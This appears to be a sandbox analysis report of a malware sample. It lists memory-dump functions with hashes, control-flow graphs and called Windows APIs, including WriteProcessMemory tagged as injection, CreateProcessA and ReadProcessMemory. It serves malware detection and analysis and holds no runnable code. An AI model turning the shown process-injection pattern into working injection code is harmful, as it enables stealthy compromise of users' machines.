                                                                                                                                                                                              • Opcode ID: 203e449d7cb55b7a589c8752e6355e1c02b0bb37028ecd3ba4445750876ec2c0
                                                                                                                                                                                              • Instruction ID: 98961f783f175299bf5726a7effff875237dd8334983c3d2f9846f309d389cc2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 203e449d7cb55b7a589c8752e6355e1c02b0bb37028ecd3ba4445750876ec2c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77620974A102288FDB54DF28D895AEDB7B1FB89310F1091E5D509ABB64DB30AE87CF50
                                                                                                                                                                                              Function 04F12918 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e3eda5217fec2157f6c4508ada6afa083a4e49ffb8f58bf209856a7f1926ef7a
                                                                                                                                                                                              • Instruction ID: 7bd85384740e186d4e77c83ace6cc43e9e66f8e09fa5a8e65d5b490cd051ecb0
                                                                                                                                                                                              • Opcode Fuzzy Hash: e3eda5217fec2157f6c4508ada6afa083a4e49ffb8f58bf209856a7f1926ef7a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69F11571E0024ACFDF15DFA8D8806ADFBB2FF84300F1685A5D451EB2A6DB34A846C780
                                                                                                                                                                                              Function 04F198C4 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: be73287e8089a0e6dc10092135d8b5403ca388575992ceef417f51afa6209967
                                                                                                                                                                                              • Instruction ID: a98dfde23aaa9f3102b2f6f53c1c99d5a0614d85d54356ef4cbee5c796db1496
                                                                                                                                                                                              • Opcode Fuzzy Hash: be73287e8089a0e6dc10092135d8b5403ca388575992ceef417f51afa6209967
                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB14D75D01258CFDF15CFA5D880B9DBBF2AF84304F1481AAD449AB265EB70E986CF50
                                                                                                                                                                                              Function 04F1ABF2 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 922083505b7e04f61d76673a2a330ac8aa8068c833395f25666d58208fc1ab60
                                                                                                                                                                                              • Instruction ID: ebb949b1195d025ac8dd230a8d15937b73e8c80f8db97cfcf29d4bff3bc2b0b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 922083505b7e04f61d76673a2a330ac8aa8068c833395f25666d58208fc1ab60
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18B14C75E01258CFDF15CFA5D880B9DBBF2AF84304F14816AD449AB265E770E946CF50
                                                                                                                                                                                              Function 00DFDA60 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 718 dfda60-dfdaef GetCurrentProcess 722 dfdaf8-dfdb2c GetCurrentThread 718->722 723 dfdaf1-dfdaf7 718->723 724 dfdb2e-dfdb34 722->724 725 dfdb35-dfdb69 GetCurrentProcess 722->725 723->722 724->725 727 dfdb6b-dfdb71 725->727 728 dfdb72-dfdb8a 725->728 727->728 730 dfdb93-dfdbc2 GetCurrentThreadId 728->730 732 dfdbcb-dfdc2d 730->732 733 dfdbc4-dfdbca 730->733 733->732
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00DFDADE
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00DFDB1B
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00DFDB58
                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00DFDBB1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2063062207-0
                                                                                                                                                                                              • Opcode ID: 901fb0748017f8e6fc4e3421ebcf8c1eaebee86516e30d5ac45cbab83bdb1768
                                                                                                                                                                                              • Instruction ID: ac5cbd0435ad879e68333b5f132eac3202eedd0abc1a782619de1ed3093c1f1d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 901fb0748017f8e6fc4e3421ebcf8c1eaebee86516e30d5ac45cbab83bdb1768
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB5146B4900249CFDB14DFAAD548BAEBBF2AF48304F24C469D119A7360D7749944CF65
                                                                                                                                                                                              Function 054D9BA8 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 876 54d9ba8-54d9bcb 877 54d9bcd 876->877 878 54d9bd2-54d9c0d 876->878 877->878 879 54d9c20-54d9c3f 878->879 882 54d9c68-54d9cd8 879->882 883 54d9cf7-54d9d04 879->883 913 54d9cda call 54daabe 882->913 914 54d9cda call 54dad3a 882->914 915 54d9cda call 54dabb6 882->915 916 54d9cda call 54dac01 882->916 917 54d9cda call 54daac0 882->917 886 54d9d0d-54d9d14 883->886 888 54d9d4f-54d9d68 886->888 889 54d9d40-54d9daf 886->889 895 54d9d81-54d9d8e 888->895 896 54d9d90-54d9da7 888->896 894 54d9ceb-54d9cef 889->894 898 54d9d6a-54d9d7f 894->898 899 54d9cf1-54d9cf2 894->899 895->889 896->895 898->895 905 54d9d16-54d9d3b 898->905 899->882 901 54d9ce0-54d9cea 905->889 907 54d9c44-54d9c5e call 54d9b50 905->907 910 54d9c0f-54d9c14 907->910 911 54d9c60-54d9c66 907->911 910->894 912 54d9c1a-54d9c1b 910->912 911->882 911->910 912->879 912->894 913->901 914->901 915->901 916->901 917->901
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Te^q$Te^q
                                                                                                                                                                                              • API String ID: 0-3743469327
                                                                                                                                                                                              • Opcode ID: ccad3892a8b347a659abd93fd99572b4c6af5458b631ac628d3fe5faf040162d
                                                                                                                                                                                              • Instruction ID: 13dfddeb44cf6b1dcc245258d00db1c4ce55ed6f98dd545637402197e5af229e
                                                                                                                                                                                              • Opcode Fuzzy Hash: ccad3892a8b347a659abd93fd99572b4c6af5458b631ac628d3fe5faf040162d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C61C574E04208CFDB08DFA9D594AEDFBF6BF89300F14902AE50AAB355D7345946CB50
                                                                                                                                                                                              Function 054D9B98 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 918 54d9b98-54d9bcb 919 54d9bcd 918->919 920 54d9bd2-54d9c0d 918->920 919->920 921 54d9c20-54d9c3f 920->921 924 54d9c68-54d9cd8 921->924 925 54d9cf7-54d9d04 921->925 955 54d9cda call 54daabe 924->955 956 54d9cda call 54dad3a 924->956 957 54d9cda call 54dabb6 924->957 958 54d9cda call 54dac01 924->958 959 54d9cda call 54daac0 924->959 928 54d9d0d-54d9d14 925->928 930 54d9d4f-54d9d68 928->930 931 54d9d40-54d9daf 928->931 937 54d9d81-54d9d8e 930->937 938 54d9d90-54d9da7 930->938 936 54d9ceb-54d9cef 931->936 940 54d9d6a-54d9d7f 936->940 941 54d9cf1-54d9cf2 936->941 937->931 938->937 940->937 947 54d9d16-54d9d3b 940->947 941->924 943 54d9ce0-54d9cea 947->931 949 54d9c44-54d9c5e call 54d9b50 947->949 952 54d9c0f-54d9c14 949->952 953 54d9c60-54d9c66 949->953 952->936 954 54d9c1a-54d9c1b 952->954 953->924 953->952 954->921 954->936 955->943 956->943 957->943 958->943 959->943
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Te^q$Te^q
                                                                                                                                                                                              • API String ID: 0-3743469327
                                                                                                                                                                                              • Opcode ID: d733cee774529ff2b63a07eeec878487ba3fe04b830aa54f4964f597ff4b7f90
                                                                                                                                                                                              • Instruction ID: c1779c3542a90c8c5370a2e35b84c90505cfb142fde5a0fe4b5a17e05aebe328
                                                                                                                                                                                              • Opcode Fuzzy Hash: d733cee774529ff2b63a07eeec878487ba3fe04b830aa54f4964f597ff4b7f90
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B51C574E052088FDB48CFE9C994AEEFBB6BF89300F14812AE519AB355DB355906CF50
                                                                                                                                                                                              Function 077606DD Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1183 77606dd-776077d 1185 77607b6-77607d6 1183->1185 1186 776077f-7760789 1183->1186 1193 776080f-776083e 1185->1193 1194 77607d8-77607e2 1185->1194 1186->1185 1187 776078b-776078d 1186->1187 1188 77607b0-77607b3 1187->1188 1189 776078f-7760799 1187->1189 1188->1185 1191 776079d-77607ac 1189->1191 1192 776079b 1189->1192 1191->1191 1195 77607ae 1191->1195 1192->1191 1202 7760877-7760931 CreateProcessA 1193->1202 1203 7760840-776084a 1193->1203 1194->1193 1196 77607e4-77607e6 1194->1196 1195->1188 1197 77607e8-77607f2 1196->1197 1198 7760809-776080c 1196->1198 1200 77607f6-7760805 1197->1200 1201 77607f4 1197->1201 1198->1193 1200->1200 1204 7760807 1200->1204 1201->1200 1214 7760933-7760939 1202->1214 1215 776093a-77609c0 1202->1215 1203->1202 1205 776084c-776084e 1203->1205 1204->1198 1207 7760850-776085a 1205->1207 1208 7760871-7760874 1205->1208 1209 776085e-776086d 1207->1209 1210 776085c 1207->1210 1208->1202 1209->1209 1212 776086f 1209->1212 1210->1209 1212->1208 1214->1215 1225 77609c2-77609c6 1215->1225 1226 77609d0-77609d4 1215->1226 1225->1226 1227 77609c8 1225->1227 1228 77609d6-77609da 1226->1228 1229 77609e4-77609e8 1226->1229 1227->1226 1228->1229 1232 77609dc 1228->1232 1230 77609ea-77609ee 1229->1230 1231 77609f8-77609fc 1229->1231 1230->1231 1233 77609f0 1230->1233 1234 7760a0e-7760a15 1231->1234 1235 77609fe-7760a04 1231->1235 1232->1229 1233->1231 1236 7760a17-7760a26 1234->1236 1237 7760a2c 1234->1237 1235->1234 1236->1237 1239 7760a2d 1237->1239 1239->1239
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0776091E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                              • Opcode ID: 1cc1a73ead47d82a6b4b4d0f3de3bd0141714127db3633af946e3bde7e5b5a60
                                                                                                                                                                                              • Instruction ID: f362b94c79a1dc2788e55f9ca79d09294fee2f84ebf4009c47495c4edb63ff17
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cc1a73ead47d82a6b4b4d0f3de3bd0141714127db3633af946e3bde7e5b5a60
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FA14AB1D0021ADFEB14CF68C845BEEBBB2FF44354F1485A9E848A7244D7749985CF92
                                                                                                                                                                                              Function 077606E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1240 77606e8-776077d 1242 77607b6-77607d6 1240->1242 1243 776077f-7760789 1240->1243 1250 776080f-776083e 1242->1250 1251 77607d8-77607e2 1242->1251 1243->1242 1244 776078b-776078d 1243->1244 1245 77607b0-77607b3 1244->1245 1246 776078f-7760799 1244->1246 1245->1242 1248 776079d-77607ac 1246->1248 1249 776079b 1246->1249 1248->1248 1252 77607ae 1248->1252 1249->1248 1259 7760877-7760931 CreateProcessA 1250->1259 1260 7760840-776084a 1250->1260 1251->1250 1253 77607e4-77607e6 1251->1253 1252->1245 1254 77607e8-77607f2 1253->1254 1255 7760809-776080c 1253->1255 1257 77607f6-7760805 1254->1257 1258 77607f4 1254->1258 1255->1250 1257->1257 1261 7760807 1257->1261 1258->1257 1271 7760933-7760939 1259->1271 1272 776093a-77609c0 1259->1272 1260->1259 1262 776084c-776084e 1260->1262 1261->1255 1264 7760850-776085a 1262->1264 1265 7760871-7760874 1262->1265 1266 776085e-776086d 1264->1266 1267 776085c 1264->1267 1265->1259 1266->1266 1269 776086f 1266->1269 1267->1266 1269->1265 1271->1272 1282 77609c2-77609c6 1272->1282 1283 77609d0-77609d4 1272->1283 1282->1283 1284 77609c8 1282->1284 1285 77609d6-77609da 1283->1285 1286 77609e4-77609e8 1283->1286 1284->1283 1285->1286 1289 77609dc 1285->1289 1287 77609ea-77609ee 1286->1287 1288 77609f8-77609fc 1286->1288 1287->1288 1290 77609f0 1287->1290 1291 7760a0e-7760a15 1288->1291 1292 77609fe-7760a04 1288->1292 1289->1286 1290->1288 1293 7760a17-7760a26 1291->1293 1294 7760a2c 1291->1294 1292->1291 1293->1294 1296 7760a2d 1294->1296 1296->1296
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0776091E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                              • Opcode ID: 64fdaa1349e288f2cb4b36460ea085e7aef11cc8fa847301f52d21a4a430eda2
                                                                                                                                                                                              • Instruction ID: 66106e66d90d009f8a91bebe913ec2a8d08930a7c2479e6601f47f1bfed8713c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 64fdaa1349e288f2cb4b36460ea085e7aef11cc8fa847301f52d21a4a430eda2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 349159B1D0021ADFEB14CF68C845BEEBBB2FF44354F1485A9E848A7244DB749985CF92
                                                                                                                                                                                              Function 00DFB7B7 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 1297 dfb7b7-dfb7d7 1298 dfb7d9-dfb7e6 call dfb458 1297->1298 1299 dfb803-dfb807 1297->1299 1306 dfb7fc 1298->1306 1307 dfb7e8 1298->1307 1300 dfb81b-dfb85c 1299->1300 1301 dfb809-dfb813 1299->1301 1308 dfb85e-dfb866 1300->1308 1309 dfb869-dfb877 1300->1309 1301->1300 1306->1299 1352 dfb7ee call dfba52 1307->1352 1353 dfb7ee call dfba60 1307->1353 1308->1309 1311 dfb89b-dfb89d 1309->1311 1312 dfb879-dfb87e 1309->1312 1310 dfb7f4-dfb7f6 1310->1306 1313 dfb938-dfb9f8 1310->1313 1314 dfb8a0-dfb8a7 1311->1314 1315 dfb889 1312->1315 1316 dfb880-dfb887 call dfb464 1312->1316 1347 dfb9fa-dfb9fd 1313->1347 1348 dfba00-dfba2b GetModuleHandleW 1313->1348 1318 dfb8a9-dfb8b1 1314->1318 1319 dfb8b4-dfb8bb 1314->1319 1317 dfb88b-dfb899 1315->1317 1316->1317 1317->1314 1318->1319 1321 dfb8bd-dfb8c5 1319->1321 1322 dfb8c8-dfb8d1 call dfb474 1319->1322 1321->1322 1328 dfb8de-dfb8e3 1322->1328 1329 dfb8d3-dfb8db 1322->1329 1330 dfb8e5-dfb8ec 1328->1330 1331 dfb901-dfb905 1328->1331 1329->1328 1330->1331 1333 dfb8ee-dfb8fe call dfb484 call dfb494 1330->1333 1354 dfb908 call dfbd50 1331->1354 1355 dfb908 call dfbd60 1331->1355 1333->1331 1334 dfb90b-dfb90e 1337 dfb931-dfb937 1334->1337 1338 dfb910-dfb92e 1334->1338 1338->1337 1347->1348 1349 dfba2d-dfba33 1348->1349 1350 dfba34-dfba48 1348->1350 1349->1350 1352->1310 1353->1310 1354->1334 1355->1334
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00DFBA1E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                                                              • Opcode ID: 43d43ec3650bc07a15bcadc94cd1d9fa31f35875b56499c69a1582769d901102
                                                                                                                                                                                              • Instruction ID: e32a5a742ea65360c41df923562e7ae43d9775a777e61e9b4bb99114411438c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43d43ec3650bc07a15bcadc94cd1d9fa31f35875b56499c69a1582769d901102
                                                                                                                                                                                              • Instruction Fuzzy Hash: B5815870A00B098FDB24DF29D14176ABBF5FF88354F04892ED18ADBA50D775E949CBA0
                                                                                                                                                                                              Function 00DF58EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: 483c2c42a3eb66e94af0dd836a8f1e7e3f5e518c0e673c9d5c0b77c60338ed4c
                                                                                                                                                                                              • Instruction ID: ec6e4e9ce00c1fdd42dc3ba94a66b4134ff79e70a52283606025c6b5dfb29941
                                                                                                                                                                                              • Opcode Fuzzy Hash: 483c2c42a3eb66e94af0dd836a8f1e7e3f5e518c0e673c9d5c0b77c60338ed4c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 904122B4C0071DCFDB24CFA9C884ADDBBB6BF49304F24806AD509AB255DB756946CFA0
                                                                                                                                                                                              Function 00DF44C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                              • Opcode ID: a98d905870845a089b74c7a72133d889b3fdbd4d1ae2ddd8b6c02db0231389f1
                                                                                                                                                                                              • Instruction ID: c1b2583e7b0353917572916d3408419b07397a2a35ded3fe0b2d178a63de184e
                                                                                                                                                                                              • Opcode Fuzzy Hash: a98d905870845a089b74c7a72133d889b3fdbd4d1ae2ddd8b6c02db0231389f1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 224113B0C0071DCFDB24DFA9C844B9EBBB6BF49304F24806AD509AB255DB756945CFA0
                                                                                                                                                                                              Function 04F1BDD0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3668623891-0
                                                                                                                                                                                              • Opcode ID: 56f8b6fe8fcbe741506227a38f8e8a6ffa128b0a2afa989806cad9b039a8b6b1
                                                                                                                                                                                              • Instruction ID: c8a40daae45ba2c197fe23232dcb74b18fb5637c969ca82336933a01d119b62f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 56f8b6fe8fcbe741506227a38f8e8a6ffa128b0a2afa989806cad9b039a8b6b1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F319A72900349DFDB12CFA9C840ADEBFF8EF08310F04805AE954AB221C335A855DFA1
                                                                                                                                                                                              Function 07760459 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077604F0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                              • Opcode ID: 31cac38d28261c077605cde2d8a9aa2f051474303963f444380871d081a4c582
                                                                                                                                                                                              • Instruction ID: d386ff10a2a93c8d571ecc95f1f75bf097e23d666035bb1d55b19e147d72b1a0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 31cac38d28261c077605cde2d8a9aa2f051474303963f444380871d081a4c582
                                                                                                                                                                                              • Instruction Fuzzy Hash: 952127B69003599FCB10CFA9C985BDEBBF1FF48310F10882AE959A7254D7789944CBA4
                                                                                                                                                                                              Function 07760460 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077604F0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                              • Opcode ID: ae3ddc6be72e84fd79227ba7ca454ed5d2b5c199757c668f65e4ac6b65550fe4
                                                                                                                                                                                              • Instruction ID: 83e1d5a7b2e6378e2a095f37663e7e4457f82982d3593f1656cb6ff25bbcd27c
                                                                                                                                                                                              • Opcode Fuzzy Hash: ae3ddc6be72e84fd79227ba7ca454ed5d2b5c199757c668f65e4ac6b65550fe4
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA2139B19003599FCB10CFAAC885BDEBBF5FF48310F108429E959A7255D7789944CBA4
                                                                                                                                                                                              Function 07760548 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077605D0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1842617075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7760000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                                                              • Opcode ID: 77796f2b8bb9d25325f0d378d52b89d7df78df8e311c2e0bc221cfbc55c19862
                                                                                                                                                                                              • Instruction ID: 2c7ab3e9d65e7c0241d2df496a752e23e93b6f5d0a2a5af67afd396ca9967ee2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 77796f2b8bb9d25325f0d378d52b89d7df78df8e311c2e0bc221cfbc55c19862
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A2134B1D003599FCB10CFA9C884AEEBBF1FF48310F10882AE959A7255C7399945CBA4
                                                                                                                                                                                              Function 054D9DB8 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: Te^q
                                                                                                                                                                                              • API String ID: 0-671973202
                                                                                                                                                                                              • Opcode ID: 81ccb53c85cfcd7047716ecf31d07c1eb566a0e382e160fb0861000c3825a69e
                                                                                                                                                                                              • Instruction ID: e0e808275176fc9ee72bcf0871eed587bd9bcce5345e29c16112fd95e50d3568
                                                                                                                                                                                              • Opcode Fuzzy Hash: 81ccb53c85cfcd7047716ecf31d07c1eb566a0e382e160fb0861000c3825a69e
